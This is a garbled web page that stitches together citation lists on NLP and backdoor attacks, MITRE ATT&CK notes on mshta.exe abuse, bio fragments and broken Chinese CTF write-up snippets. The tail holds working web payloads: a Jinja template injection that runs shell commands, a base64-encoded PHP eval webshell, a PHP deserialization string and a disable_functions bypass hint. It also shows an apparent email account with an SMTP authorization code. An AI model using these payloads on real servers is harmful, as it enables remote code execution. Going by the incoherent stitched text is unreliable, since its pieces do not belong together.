xiao steganography github

Department of the University of Minnesota--Twin Cities. Weiwen Xu, Huihui Zhang, Deng Cai and Wai Lam, Addressing Inquiries about History: An Efficient and Practical Framework for Evaluating Open-domain Chatbot Consistency William Dyer, Richard Futrell, Zoey Liu and Greg Scontras, A Survey of Data Augmentation Approaches for NLP Leilei Gan, Jiwei Li, Tianwei Zhang, Xiaoya Li, Yuxian Meng, Fei Wu, Shangwei Guo, and Chun Fan. Hieu Minh Tran, Duy Phung and Thien Huu Nguyen, A Targeted Assessment of Incremental Processing in Neural Language Models and Humans [28], NanHaiShu uses mshta.exe to load its program and files. ID Data Source Data Component Detects; DS0017: Command: Command Execution: Monitor executed commands and arguments that may abuse Visual Basic (VB) for execution. [pdf], Topological Detection of Trojaned Neural Networks. Xinyi Mou, Zhongyu Wei, Lei Chen, Shangyi Ning, Yancheng He, Changjian Jiang and Xuanjing Huang, Neural-Symbolic Solver for Math Word Problems with Auxiliary Tasks Yichun Yin, Cheng Chen, Lifeng Shang, Xin Jiang, Xiao Chen and Qun Liu, PP-Rec: News Recommendation with Personalized User Interest and Time-aware News Popularity [pdf], Backdoor Attacks in Neural Networks. Robustness Evaluation of Multi-modal Fake News Detection. ID Data Source Data Component Detects; DS0017: Command: Command Execution: Monitor executed commands and arguments that may abuse Visual Basic (VB) for execution. [pdf], Traceback of Data Poisoning Attacks in Neural Networks. Stephane Aroca-Ouellette, Cory Paik, Alessandro Roncone and Katharina Kann, Revisiting the Evaluation of End-to-end Event Extraction injection (for fuzzing error handling), Concurrency bugs, memory disclosures, and side channels, Memory safety, control-flow integrity, (re-)randomization, arXiv, 2021. Quanxin Zhang, Wencong Ma, Yajie Wang, Yaoyuan Zhang, Zhiwei Shi, and Yuanzhang Li. [pdf], Backdoor Attacks on Vision Transformers. arXiv, 2021. Qianqian Xie, Jimin Huang, Pan Du and Min Peng, Paths to Relation Extraction through Semantic Structure arXiv, 2022. [extension], Defense-Resistant Backdoor Attacks against Deep Neural Networks in Outsourced Cloud Environment. [code], DriNet: Dynamic Backdoor Attack against Automatic Speech Recognization Models. Mshta.exe. iFIZZ: Deep-State and Efficient Fault-Scenario Generation to Test IoT Firmware. arXiv, 2022. Xiaorui Qin, Yuyin Lu, Yufu Chen and Yanghui Rao, Leveraging Argumentation Knowledge Graph for Interactive Argument Pair Identification On Mitigating Social Biases in Language Modelling and Generation Yinpei Dai, Hangyu Li, Yongbin Li, Jian Sun, Fei Huang, Luo Si and Xiaodan Zhu, Continual Learning for Task-oriented Dialogue System with Iterative Network Pruning, Expanding and Masking Xin Xin, Jinlong Li and Zeqi Tan, Math Word Problem Solving with Explicit Numerical Values [pdf] Dinghao Liu, Qiushi Wu, Shouling Ji, Kangjie Lu, Zhenguang Liu, Jianhai Chen, and Qinming He. Pedro Colon-Hernandez, Yida Xin, Henry Lieberman, Catherine Havasi, Cynthia Breazeal and Peter Chin, Fusion: Towards Automated ICD Coding via Feature Compression Kangjie Lu, Zhichun Li, Vasileios Kemerlis, Zhenyu Wu, Long Lu, Cong Zheng, Zhiyun Qian, Wenke Lee, and Guofei Jiang. [pdf] Yuhao Zhang, Aws Albarghouthi, and Loris D'Antoni. Canasai Kruengkrai, Junichi Yamagishi and Xin Wang, RealTranS: End-to-End Simultaneous Speech Translation with Convolutional Weighted-Shrinking Transformer Diego Antognini and Boi Faltings, Parallel Attention Network with Sequence Matching for Video Grounding Jiacheng Ye, Tao Gui, Yichao Luo, Yige Xu and Qi Zhang, Dual Slot Selector via Local Reliability Verification for Dialogue State Tracking [demo], Object-Oriented Backdoor Attack Against Image Captioning. Liang Ding, Longyue Wang, Xuebo Liu, Derek F. Wong, Dacheng Tao and Zhaopeng Tu, Do Multilingual Neural Machine Translation Models Contain Language Pair Specific Attention Heads? Pengfei Xia, Hongjing Niu, Ziqiang Li, and Bin Li. Exploring the Weakness of Commonsense Causal Reasoning Models Ashwinkumar Ganesan, Francis Ferraro and Tim Oates, Enhancing Zero-shot and Few-shot Stance Detection with Commonsense Knowledge Graph Approaching Fairness with Word Substitution Robustness Methods for Text Classification Security (ICICS): 2019, 2021, 2022. Zeqiu Wu, Michel Galley, Chris Brockett, Yizhe Zhang and Bill Dolan, Trade the Event: Corporate Events Detection for News-Based Event-Driven Trading Cheonbok Park, Yunwon Tae, TaeHee Kim, Soyoung Yang, Mohammad Azam Khan, Lucy Park and Jaegul Choo, Taming Pre-trained Language Models with N-gram Representations for Low-Resource Domain Adaptation Jing Xu, Rui Wang, Kaitai Liang, and Stjepan Picek. Phishing Target Reconnaissance and Attack Resource Analysis Operation Muzabi. Hongqiu Wu, Hai Zhao and Min Zhang, Scheduled Dialog Policy Learning: An Automatic Curriculum Learning Framework for Task-oriented Dialog System Jinghui Qin, Xiaodan Liang, Yining Hong, Jianheng Tang and Liang Lin, BanditMTL: Bandit-based Multi-task Learning for Text Classification Karthik Ganesan, Pakhi Bamdev, Jaivarsan B, Amresh Venugopal and Abhinav Tushar, Explainable Inference Over Grounding-Abstract Chains for Science Questions Logan Born, Kathryn Kelley, M. Willis Monroe and Anoop Sarkar, Unsupervised Label Refinement Improves Dataless Text Classification Hu Xu, Gargi Ghosh, Po-Yao Huang, Prahal Arora, Masoumeh Aminzadeh, Christoph Feichtenhofer, Florian Metze and Luke Zettlemoyer, Corpus-Level Evaluation for Event QA: The IndiaPoliceEvents Corpus Covering the 2002 Gujarat Violence Tatiana Ringenberg, Kathryn Seigfried-Spellar and Julia Rayz, Detecting Domain Polarity-Changes of Words in a Sentiment Lexicon [link], Robust Backdoor Injection with the Capability of Resisting Network Transfer. Tasnim Mohiuddin, M Saiful Bari and Shafiq Joty, Provably Secure Generative Linguistic Steganography [pdf], An Invisible Black-box Backdoor Attack through Frequency Domain. My work has resulted in many updates in popular systems such as the Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. [pdf], Attention Hijacking in Trojan Transformers. Alexander Fabbri, Faiaz Rahman, Imad Rizvi, Borui Wang, Haoran Li, Yashar Mehdad and Dragomir Radev, Adapting High-resource NMT Models to Translate Low-resource Related Languages without Parallel Data https://us-cert.cisa.gov/ncas/alerts/aa20-301a. Wietse De Vries and Malvina Nissim, Can Cognate Prediction Be Modelled as a Low-Resource Machine Translation Task? LazyScripter: From Empire to double RAT. Mikel Bober-Irizar, Ilia Shumailov, Yiren Zhao, Robert Mullins, and Nicolas Papernot. Olga Kovaleva, Saurabh Kulshreshtha, Anna Rogers and Anna Rumshisky, We will Reduce Taxes - Identifying Election Pledges with Language Models Xiao believes that the netizens' freedom to spread information on the Internet has forced the government to listen to popular demands of netizens. [pdf], Defending Label Inference and Backdoor Attacks in Vertical Federated Learning. Compare recent invocations of mshta.exe with prior history of known good arguments and executed .hta files to determine anomalous and potentially adversarial activity. [link], Backdoor Attacks and Defenses in Federated Learning: State-of-the-art, Taxonomy, and Future Directions. Shengfei Lyu and Huanhuan Chen, Decoupling Adversarial Training for Fair NLP Yash Kumar Lal, Nathanael Chambers, Raymond Mooney and Niranjan Balasubramanian, Dialogue in the Wild: Learning from a Deployed Role-Playing Game with Humans and Bots (2021, December 2). Arkadiy Saakyan, Tuhin Chakrabarty and Smaranda Muresan, Robustness Testing of Language Understanding in Task-Oriented Dialog These programs will be executed under the context of the user and will have the account's associated permissions level. Zhi Chen, Lu Chen, Hanqi Li, Ruisheng Cao, Da Ma, Mengyue Wu and Kai Yu, Adjacency List Oriented Relational Fact Extraction via Adaptive Multi-task Learning Yajie Wang, Kongyang Chen, Yu-An Tan, Shuxin Huang, Wencong Ma, and Yuanzhang Li. Berry, A., Galang, L., Jiang, G., Leathery, J., Mohandas, R. (2017, April 11). Yu Lu, Jiali Zeng, Jiajun Zhang, Shuangzhi Wu and Mu Li, Analyzing the Source and Target Contributions to Predictions in Neural Machine Translation Yossi Adi, Carsten Baum, Moustapha Cisse, Benny Pinkas, and Joseph Keshet. Controlled applications are programs, such as VoIP, IM, P2P and games, that can be blocked or allowed for different groups of computers, depending on productivity or security concerns. [link], CRFL: Certifiably Robust Federated Learning against Backdoor Attacks. Jason Wei, Clara Meister and Ryan Cotterell, Shortformer: Better Language Modeling using Shorter Inputs Zhiwen Tang, Hrishikesh Kulkarni and Grace Hui Yang, Structured Refinement for Sequential Labeling Panagiota Kiourti, Kacper Wardega, Susmit Jha, and Wenchao Li. Libo Qin, Fuxuan Wei, Tianbao Xie, Xiao Xu, Wanxiang Che and Ting Liu, Explainable Prediction of Text Complexity: The Missing Preliminaries for Text Simplification Lucas Azevedo, Mathieu dAquin, Brian Davis and Manel Zarrouk, Semantic Relation-aware Difference Representation Learning for Change Captioning Retrieved January 29, 2021. Yansong Gao, Bao Gia Doan, Zhi Zhang, Siqi Ma, Anmin Fu, Surya Nepal, and Hyoungshick Kim. Saiful Islam, Kazi Mubasshir, Yuan-Fang Li, Yong-Bin Kang, M. Sohel Rahman and Rifat Shahriyar, Investigating Memorization of Conspiracy Theories in Text Generation Yaojie Lu, Hongyu Lin, Jin Xu, Xianpei Han, Jialong Tang, Annan Li, Le Sun, Meng Liao and Shaoyi Chen, Mid-Air Hand Gestures for Post-Editing of Machine Translation Xinnuo Xu, Guoyin Wang, Young-Bum Kim and Sungjin Lee, Metaphor Generation with Conceptual Mappings Inferring Fine-grained Provenance arXiv, 2022. Oleg Vasilyev and John Bohannon, Assessing Dialogue Systems with Distribution Distances Shengshan Hu, Ziqi Zhou, Yechao Zhang, Leo Yu Zhang, Yifeng Zheng, Yuanyuan HE, and Hai Jin. [code], Anti-Backdoor Learning: Training Clean Models on Poisoned Data. Yun-Zhu Song, Yi-Syuan Chen, Yi-Ting Chang, Shao-Yu Weng and Hong-Han Shuai, LICHEE: Improving Language Model Pre-training with Multi-grained Tokenization Haoming Jiang, Danqing Zhang, Tianyu Cao, Bing Yin and Tuo Zhao, Competence-based Multimodal Curriculum Learning for Medical Report Generation Backdoor learning is an emerging research area, which discusses the security issues of the training process towards machine learning algorithms. Wei Song, Shuhui Zhou, Ruiji Fu, Ting Liu and Lizhen Liu, Long Text Generation by Modeling Sentence-Level and Discourse-Level Coherence Yangyi Chen, Fanchao Qi, Zhiyuan Liu, and Maosong Sun. 2015-2022, The MITRE Corporation. Inigo Jauregi Unanue, Jacob Parnell and Massimo Piccardi, SaRoCo: Detecting Satire in a Novel Romanian Corpus of News Articles Runzhe Yang, Jingxiao Chen and Karthik Narasimhan, Lower Perplexity is Not Always Human-Like Sora Ohashi, Junya Takayama, Tomoyuki Kajiwara and Yuki Arase, Deep Context- and Relation-Aware Learning for Aspect-based Sentiment Analysis Sakshi Udeshi, Shanshan Peng, Gerald Woo, Lionell Loh, Louth Rawshan, and Sudipta Chattopadhyay. Pedro Rodriguez, Joe Barrow, Alexander Miserlis Hoyle, John P. Lalor, Robin Jia and Jordan Boyd-Graber, Capturing Event Argument Interaction via A Bi-Directional Entity-Level Recurrent Decoder Jun Gao, Wei Bi, Ruifeng Xu and Shuming Shi, Relation Extraction with Type-aware Map Memories of Word Dependencies Shuaiqi Liu, Jiannong Cao, Ruosong Yang and Zhiyuan Wen, Constraint based Knowledge Base Distillation in End-to-End Task Oriented Dialogs I am an assistant professor in the Computer Science & Engineering Seohyun Back, Akhil Kedia, Sai Chetan Chinthakindi, Haejun Lee and Jaegul Choo, Making Better Use of Bilingual Information for Cross-Lingual AMR Parsing Tobias Lorenz, Marta Kwiatkowska, and Mario Fritz. [pdf], A Backdoor Attack against 3D Point Cloud Classifiers. arXiv, 2021. Yinpeng Dong, Xiao Yang, Zhijie Deng, Tianyu Pang, Zihao Xiao, Hang Su, and Jun Zhu. Zewen Chi, Li Dong, Bo Zheng, Shaohan Huang, Xian-Ling Mao, Heyan Huang and Furu Wei, GhostBERT: Generate More Features with Cheap Operations for BERT Maximilian Noppel, Lukas Peter, and Christian Wressnegger. Dr#?oJ[;|9Wx0/et?rqM(-9JI6(hEgeBc.x,<;)yrZvo5mrkji/Plkjib(fedFE[!Y^]\[Tx;QuU7SRKo2NGLEDh+AFEDC<;_?>~}5Y987w5.R21qp('K+$j"'~}${"y?_{tyrwp6tmUqj0nmleMib(fe^c"_^@VUTxXWV8NSRKJn10LKJIHAe? Yangming Li and Kaisheng Yao, HERALD: An Annotation Efficient Method to Detect User Disengagement in Social Conversations Zhuang Chen and Tieyun Qian, The Limitations of Limited Context for Constituency Parsing Feilong Chen, Xiuyi Chen, Fandong Meng, Peng Li and Jie Zhou, Joint Optimization of Tokenization and Downstream Model Jian Guan, Zhexin Zhang, Zhuoer Feng, Zitao Liu, Wenbiao Ding, Xiaoxi Mao, Changjie Fan and Minlie Huang, Improving Encoder by Auxiliary Supervision Tasks for Table-to-Text Generation Jingyi Zhang and Josef Van Genabith, Beyond Offline Mapping: Learning Cross-lingual Word Embeddings through Context Anchoring Xudong Pan, Mi Zhang, Yifan Yan, and Min Yang. arXiv, 2019. Casper Hansen, Christian Hansen and Lucas Chaves Lima, Addressing Semantic Drift in Generative Question Answering with Auxiliary Extraction Mukund Srinath, Shomir Wilson and C Lee Giles, GL-GIN: Fast and Accurate Non-Autoregressive Model for Joint Multiple Intent Detection and Slot Filling Zhangming Chan, Lemao Liu, Juntao Li, Haisong Zhang, Dongyan Zhao, Shuming Shi and Rui Yan, DocNLI: A Large-scale Dataset for Document-level Natural Language Inference Yilin Shen, Yen-Chang Hsu, Avik Ray and Hongxia Jin, Causal Analysis of Syntactic Agreement Mechanisms in Neural Language Models Jiexi Liu, Ryuichi Takanobu, Jiaxin Wen, Dazhen Wan, Hongguang Li, Weiran Nie, Cheng LI, Wei Peng and Minlie Huang, TAT-QA: A Question Answering Benchmark on a Hybrid of Tabular and Textual Content in Finance An Analysis of Undesirable Content in the Common Crawl Corpus Adversaries may abuse PowerShell commands and scripts for execution. [pdf], Dangerous Cloaking: Natural Trigger based Backdoor Attacks on Object Detectors in the Physical World. Xinyu Wang, Yong Jiang, Nguyen Bach, Tao Wang, Zhongqiang Huang, Fei Huang and Kewei Tu, On Finding the K-best Non-projective Dependency Trees Mingyuan Fan, Yang Liu, Cen Chen, Ximeng Liu, and Wenzhong Guo. DongHyun Choi, Myeong Cheol Shin, EungGyun Kim and Dong Ryeol Shin, GeoQA: A Geometric Question Answering Benchmark Towards Multimodal Numerical Reasoning arXiv, 2021. Siyuan Cheng, Yingqi Liu, Shiqing Ma, and Xiangyu Zhang. Changhan Wang, Morgane Riviere, Ann Lee, Anne Wu, Chaitanya Talnikar, Daniel Haziza, Mary Williamson, Juan Pino and Emmanuel Dupoux, Fine-grained Information Extraction from Biomedical Literature based on Knowledge-enriched Abstract Meaning Representation YunSeok Choi, JinYeong Bak, CheolWon Na and Jee-Hyong Lee, Energy-based Unknown Intent Detection with Data Manipulation Guangyu Shen, Yingqi Liu, Guanhong Tao, Qiuling Xu, Zhuo Zhang, Shengwei An, Shiqing Ma, and Xiangyu Zhang. Junyu Luo, Cao Xiao, Lucas Glass, Jimeng Sun and Fenglong Ma, Is Human Scoring the Best Criteria for Summary Evaluation? Clara Meister, Martina Forster and Ryan Cotterell, Language Model Evaluation Beyond Perplexity Shahbaz Syed, Khalid Al Khatib, Milad Alshomary, Henning Wachsmuth and Martin Potthast, Substructure Substitution: Structured Data Augmentation for NLP Jinbae Im, Moonki Kim, Hoyeop Lee, Hyunsouk Cho and Sehee Chung, Which Linguist Invented the Lightbulb? Automatically Identifying Quirky Scientific Achievements arXiv, 2022. Software Watermarking using Return-Oriented Programming. Chulin Xie, Keli Huang, Pinyu Chen, and Bo Li. Kangjie Chen, Yuxian Meng, Xiaofei Sun, Shangwei Guo, Tianwei Zhang, Jiwei Li, and Chun Fan. Muhammad Abdul-Mageed, AbdelRahim Elmadany and El Moatez Billah Nagoudi, Glancing Transformer for Non-Autoregressive Neural Machine Translation Yixin Liu and Pengfei Liu, Avoiding Overlap in Data Augmentation for AMR-to-Text Generation Hiroshi Noji and Yohei Oseki, Verb Sense Clustering using Contextualized Word Representations for Semantic Frame Induction Xinzhe Zhou, Wenhao Jiang, Sheng Qi, and Yadong Mu. Jingfeng Zhang, Haiwen Hong, Yin Zhang, Yao Wan, Ye Liu and Yulei Sui, Exploring Self-Identified Counseling Expertise in Online Support Forums Sachin Kumar, Antonios Anastasopoulos, Shuly Wintner and Yulia Tsvetkov, On Positivity Bias in Negative Reviews Tong Zhou, Pengfei Cao, Yubo Chen, Kang Liu, Jun Zhao, Kun Niu, Weifeng Chong and Shengping Liu, E2E-VLP: End-to-End Vision-Language Pre-training Enhanced by Visual Learning Weijia Xu, Shuming Ma, Dongdong Zhang and Marine Carpuat, Leveraging Topic Relatedness for Argument Persuasion Pradhan, A. Shanjiaoyang Huang, Weiqi Peng, Zhiwei Jia, and Zhuowen Tu. Retrieved November 14, 2018. arXiv, 2020. Chen Liang, Simiao Zuo, Minshuo Chen, Haoming Jiang, Xiaodong Liu, Pengcheng He, Tuo Zhao and Weizhu Chen, Named Entity Recognition with Small Strongly Labeled and Large Weakly Labeled Data [code], FLGUARD: Secure and Private Federated Learning. arXiv, 2021. Lei Ji, Xianglin Guo, Haoyang Huang and Xilin Chen, BERTifying the Hidden Markov Model for Multi-Source Weakly Supervised Named Entity Recognition arXiv, 2022. Wei Zhang, Ziming Huang, Yada Zhu, Guangnan Ye, Xiaodong Cui and Fan Zhang, Length-Adaptive Transformer: Train Once with Length Drop, Use Anytime with Search Jinyu Guo, Kai Shuang, Jijie Li and Zihan Wang, Integrating Semantics and Neighborhood Information with Graph-Driven Generative Models for Document Retrieval arXiv, 2020. Tianyu Gu, Brendan Dolan-Gavitt, and Siddharth Garg. Taolin Zhang, Zerui Cai, Chengyu Wang, Minghui Qiu, Bite Yang and XIAOFENG HE, Structural Guidance for Transformer Language Models There was a problem preparing your codespace, please try again. Koadic. Huili Chen, Cheng Fu, Jishen Zhao, and Farinaz Koushanfar. Retrieved March 22, 2022. Pengfei Cao, Xinyu Zuo, Yubo Chen, Kang Liu, Jun Zhao, Yuguang Chen and Weihua Peng, BACO: A Background Knowledge- and Content-Based Framework for Citing Sentence Generation Xiao, C. (2018, September 17). Zhicong Yan, Gaolei Li, Yuan Tian, Jun Wu, Shenghong Li, Mingzhe Chen, and H. Vincent Poor. Zhuoyuan Mao, Prakhar Gupta, Chenhui Chu, Martin Jaggi and Sadao Kurohashi, HateCheck: Functional Tests for Hate Speech Detection Models Siddharth Karamcheti, Ranjay Krishna, Li Fei-Fei and Christopher Manning, Neural Machine Translation with Monolingual Translation Memory [pdf], What Do You See? Bertie Vidgen, Tristan Thrush, Zeerak Waseem and Douwe Kiela, Towards User-Driven Neural Machine Translation Zhuosheng Zhang and Hai Zhao, Learning Language Specific Sub-network for Multilingual Machine Translation He was a visiting scholar with University of British-Columbia in 2014, with University of Maryland-College Park during 2011 2012, and with New Jersey Institute of Technology during 2004 2005. [pdf], Exposing Backdoors in Robust Machine Learning Models. Boxi Cao, Hongyu Lin, Xianpei Han, Le Sun, Lingyong Yan, Meng Liao, Tong Xue and Jin Xu, End-to-End AMR Corefencence Resolution Giuseppe Castellucci, Simone Filice, Danilo Croce and Roberto Basili, Quantifying and Avoiding Unfair Qualification Labour in Crowdsourcing contact me! Weidong Guo, Mingjun Zhao, Lusheng Zhang, Di Niu, Jinwen Luo, Zhenhua Liu, Zhenyang Li and Jianbo Tang, Detecting Hallucinated Content in Conditional Neural Sequence Generation [pdf], Textual Backdoor Attacks Can Be More Harmful via Two Simple Tricks. Liying Cheng, Tianyu Wu, Lidong Bing and Luo Si, Mitigating Bias in Session-based Cyberbullying Detection: A Non-Compromising Approach [23][24], LazyScripter has used mshta.exe to execute Koadic stagers. A Sober Look at NLP Tasks through the Lens of Social Impact arXiv, 2022. Jingye Li, Kang Xu, Fei Li, Hao Fei, Yafeng Ren and Donghong Ji, Adversary-Aware Rumor Detection Silvia Casacuberta, Karina Halevy and Damian Blasi, Attention-based Contextual Language Model Adaptation for Speech Recognition [pdf], SanitAIs: Unsupervised Data Augmentation to Sanitize Trojaned Neural Networks. Yao Qiu, Jinchao Zhang and Jie Zhou, Multi-Granularity Contrasting for Cross-Lingual Pre-Training Haoyue Shi, Karen Livescu and Kevin Gimpel, Towards Protecting Vital Healthcare Programs by Extracting Actionable Knowledge from Policy [pdf] Dancing with wolves: An intra-process isolation technique with privileged hardware. [pdf], Backdoor Attack through Frequency Domain. [pdf] Hao Zhou, Weidong Ren, Gongshen Liu, Bo Su and Wei Lu, XeroAlign: Zero-shot cross-lingual transformer alignment [pdf], Label-Consistent Backdoor Attacks. [link], Simtrojan: Stealthy Backdoor Attack. Yijun Wang, Changzhi Sun, Yuanbin Wu, Hao Zhou, Lei Li and Junchi Yan, Question Answering Over Temporal Knowledge Graphs Tetsuya Sakai, SocAoG: Incremental Graph Parsing for Social Relation Inference in Dialogues Xiaoxue Zang, Lijuan Liu, Maria Wang, Yang Song, Hao Zhang and Jindong Chen, Comprehensive Study: How the Context Information of Different Granularity Affects Dialogue State Tracking? [pdf], Neural Cleanse: Identifying and Mitigating Backdoor Attacks in Neural Networks. Nuria Rodrguez-Barroso, Eugenio Martnez-Cmara, M. Victoria Luznb, and Francisco Herrera. Guanqing Liang and Cane Wing-Ki Leung, On Orthogonality Constraints for Transformers Salvatore Giorgi, Lyle Ungar and H. Andrew Schwartz. Zhen Xiang, David J. Miller, Siheng Chen, Xi Li, and George Kesidis. Shakti Kumar, Jithin Pradeep and Hussain Zaidi, How to Split: the Effect of Word Segmentation on Gender Bias in Speech Translation [pdf], TrojanNet: Embedding Hidden Trojan Horse Models in Neural Network. Yitao Cai, Zhe Lin and Xiaojun Wan, Pushing Paraphrase Away from Original Sentence: A Multi-Round Paraphrase Generation Approach Xiaojun Xu, Qi Wang, Huichen Li, Nikita Borisov, Carl A. Gunter, and Bo Li. Thanh-Tung Nguyen, Xuan-Phi Nguyen, Shafiq Joty and Xiaoli Li, Reliability Testing for Natural Language Processing Systems Kuntal Kumar Pal, Kazuaki Kashihara, Pratyay Banerjee, Swaroop Mishra, Ruoyu Wang and Chitta Baral, Cluster-Former: Clustering-based Sparse Transformer for Question Answering [pdf], TAD: Trigger Approximation based Black-box Trojan Detection for AI. Ching Pui Wan, and Qifeng Chen. Qingfu Zhu, Wei-Nan Zhang, Ting Liu and William Yang Wang, A Cognitive Regularizer for Language Modeling Mingzhu Wu, Nafise Sadat Moosavi, Dan Roth and Iryna Gurevych, Evidence-based Factual Error Correction [pdf], Detection of Backdoors in Trained Classiers Without Access to the Training Set. Shan Yang, Yongfei Zhang, Guanglin Niu, Qinghua Zhao and Shiliang Pu, Enhancing Descriptive Image Captioning with Natural Language Inference Lang Yu and Allyson Ettinger, Lifelong Learning of Topics and Domain-Specific Word Embeddings Jinyuan Jia, Xiaoyu Cao, and Neil Zhenqiang Gong. [10][11], BabyShark has used mshta.exe to download and execute applications from a remote server. Karin Sevegnani, David M. Howcroft, Ioannis Konstas and Verena Rieser, ForecastQA: A Question Answering Challenge for Event Forecasting with Temporal Text Data arXiv, 2021. Madhusudhan Aithal and Chenhao Tan, A Semantics-aware Transformer Model of Relation Linking for Knowledge Base Question Answering arXiv, 2022. Monitor use of HTA files. Hanqi Yan, Lin Gui, Gabriele Pergola and Yulan He, Evaluation of Thematic Coherence in Microblogs Guanhong Tao, Guangyu Shen, Yingqi Liu, Shengwei An, Qiuling Xu, Shiqing Ma, Pan Li, and Xiangyu Zhang. Meihan Tong, Shuai Wang, Bin Xu, Yixin Cao, Minghui Liu, Lei Hou and Juanzi Li, Knowing the No-match: Entity Alignment with Dangling Cases Zhe Wang, Chenggang Wu, Mengyao Xie, Yinqian Zhang, Kangjie Lu, Xiaofeng Zhang, Yuanming Lai, Yan Kang, and Min Yang. (2017, May 24). [pdf] Munachiso Nwadike, Takumi Miyawaki, Esha Sarkar, Michail Maniatakos, and Farah Shamout. Yuanhe Tian, Guimin Chen, Yan Song and Xiang Wan, Benchmarking Scalable Methods for Streaming Cross Document Entity Coreference Mingfu Xue, Can He, Jian Wang, and Weiqiang Liu. Yash Khemchandani, Sarvesh Mehtani, Vaidehi Patil, Abhijeet Awasthi, Partha Talukdar and Sunita Sarawagi, Interpretable and Low-Resource Entity Matching via Decoupling Feature Learning from Decision Making Tao Qi, Fangzhao Wu, Chuhan Wu and Yongfeng Huang, Ultra-Fine Entity Typing with Weak Supervision from a Masked Language Model Lya Hulliyyatus Suadaa, Hidetaka Kamigaito, Kotaro Funakoshi, Manabu Okumura and Hiroya Takamura, Check It Again: Progressive Visual Question Answering via Visual Entailment Weizhou Shen, Siyue Wu, Yunyi Yang and Xiaojun Quan, Knowledge-Enriched Event Causality Identification via Latent Structure Induction Networks (2020, April 20). Sabyasachee Baruah, Sandeep Nallan Chakravarthula and Shrikanth Narayanan, RetroGAN: A Cyclic Post-Specialization System for Improving Out-of-Knowledge and Rare Word Representations Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. [code], One Step Further: Evaluating Interpreters using Metamorphic Testing. Packed, Printable, and Polymorphic Return-Oriented Programming, CSCI 5271: Introduction to Computer Security, CSCI 4061: Introduction to Operating Systems, CSCI 8271: Security and Privacy in Computing, MPI-SWS & CISPA, Saarland University, Saarbrcken, Germany, Singapore Management University, Singapore, Program analysis: Indirect-call analysis, alias analysis, Defense: Intra-process isolation, control- and data-flow integrity, memory-permission enforcement, Cross-checking, rule inference, staged symbolic Ganqu Cui, Lifan Yuan, Bingxiang He, Yangyi Chen, Zhiyuan Liu, and Maosong Sun. [code], DEFEAT: Deep Hidden Feature Backdoor Attacks by Imperceptible Perturbation and Latent Representation Constraints. Ziyan Wu, Tianming Cui, Arvind Narayanan, Yang Zhang, Kangjie Lu, Antonia Zhai, and Zhi-Li Zhang. [code], SentiNet: Detecting Localized Universal Attacks Against Deep Learning Systems. Kaspar Beelen, Federico Nanni, Mariona Coll Ardanuy, Kasra Hosseini, Giorgia Tolfo and Barbara McGillivray, Understanding Feature Focus in Multitask Settings for Lexico-semantic Relation Identification Starting from the pretrained multimodal representation model CLIP released by OpenAI, we switched its text encoder with a pretrained multilingual text encoder XLM-R, and aligned both languages and image representations by a two-stage training Saumya Sahai, Oana Balalau and Roxana Horincar, Towards Quantifiable Dialogue Coherence Evaluation Comparing Performance at the Instance Level Jiajia Tang, Kang Li, Xuanyu Jin, Andrzej Cichocki, Qibin Zhao and Wanzeng Kong, Knowledgeable or Educated Guess? Yiran Wang, Hiroyuki Shindo, Yuji Matsumoto and Taro Watanabe, COINS: Dynamically Generating COntextualized Inference Rules for Narrative Story Completion Farhad Moghimifar, Lizhen Qu, Terry Yue Zhuo, Gholamreza Haffari and Mahsa Baktashmotlagh, In Factuality: Efficient Integration of Relevant Facts for Visual Question Answering Hayato Tsukagoshi, Ryohei Sasano and Koichi Takeda, OntoGUM: Evaluating Contextualized SOTA Coreference Resolution on 12 More Genres Ruixiang Tang, Mengnan Du, Ninghao Liu, Fan Yang, and Xia Hu. SONIC Visualizer (audio spectrum) Some classic challenges use an audio file to hide a flag or other sensitive stuff. Tong Wang, Yuan Yao, Feng Xu, Shengwei An, and Ting Wang. Xiangrui Cai, haidong xu, Sihan Xu, Ying Zhang, and Xiaojie Yuan. Hao Sun, Zhenru Lin, Chujie Zheng, Siyang Liu and Minlie Huang, RiddleSense: Reasoning about Riddle Questions Featuring Linguistic Creativity and Commonsense Knowledge He was a visiting scholar with University of British-Columbia in 2014, with University of Maryland-College Park during 2011 2012, and with New Jersey Institute of Technology during 2004 2005. Le Feng, Sheng Li, Zhenxing Qian, and Xinpeng Zhang. Jiasheng Si, Deyu Zhou, Tongzhe Li, Xingyu Shi and Yulan He, Hidden Killer: Invisible Textual Backdoor Attacks with Syntactic Trigger [pdf], VulnerGAN: A Backdoor Attack through Vulnerability Amplification against Machine Learning-based Network Intrusion Detection Systems. Dou Hu, Lingwei Wei and Xiaoyong Huai, Challenges in Information-Seeking QA: Unanswerable Questions and Paragraph Retrieval Chuanshuai Chen, and Jiazhu Dai. [pdf], Baseline Pruning-Based Approach to Trojan Detection in Neural Networks. arXiv, 2020. '*'.chr(0), $data);, usernamepassworduserpayload, O:4:"User":2:{s:8:"username";s:5:"admin";s:8:"password";s:41:"O:4:"evil":2:{s:4:"hint";s:8:"hint.php";}";}";s:8:"password";s:41:"username, 23\0\0\03password24,username24\0 payload, , network signzM+base64(score)+==, F12 SECRET_KEY()Flaskflag ?flag={{config.items()}},configSECRET_KEY, payload?flag={{ config.__class__.__init__.__globals__['os'].popen('cat flag').read() }}, pass a parameter and maybe the flag files filename is random :>, 1 {} php4exec()passthru()system() shell_exec(), systemexec(),passthru() _15849flag, , 123456123456(yyds) base64, ,base64PD9waHAgZXZhbCgkX1BPU1RbJzEyMyddKTs/Pg==php, flag qq , f12flagtig robots.txtgitGit_Extract, qqIDA, bugkuku@163.com BIPHIVHSLESYPHMZ smtp.163.com, 163 foxmail, /admin flag, \ .php|.php,\\|\||.php|.php, $first|.php $zeroZmxhZy5waHA (flag.phpbase64), ZmxhZy5waHAa, ifflagsha1, eval($_GET['flag']echo $flag, html phpinfosystemexec putenvdisable_functions, LD_PRELOAD .antproxy.php flag, base64504b0304zip flag, _200txtmd5124tab, 0tab11071011211237310710750484848125asciiIkk2000, imageIN.pngthekey.txthint.txtimageINpassword.txt thekey.txtbf bf+,15() bugku233_ flag, baeutiful_skybeautiful_sky.zip(baeutifulbeautiful), docdecencoded_by_we1,we1doc base58 base64zip, llllovewe1 flag.txtflag, happyctfjpgrabbit, base64flagjphsflag, ICMP replyttl64request ttl, 25581 48822*22, 23+22=45,488-4+45=52923*23, , (Long spruce boards)LSBsave binforemost tweakpngIDATIDAT binwalk1735C3.bmp ntfsNtfsStreamsEditor2, , binwalktar.gz246010binwalk4.png0107zIDAT flag, SNOWSNOW.EXE 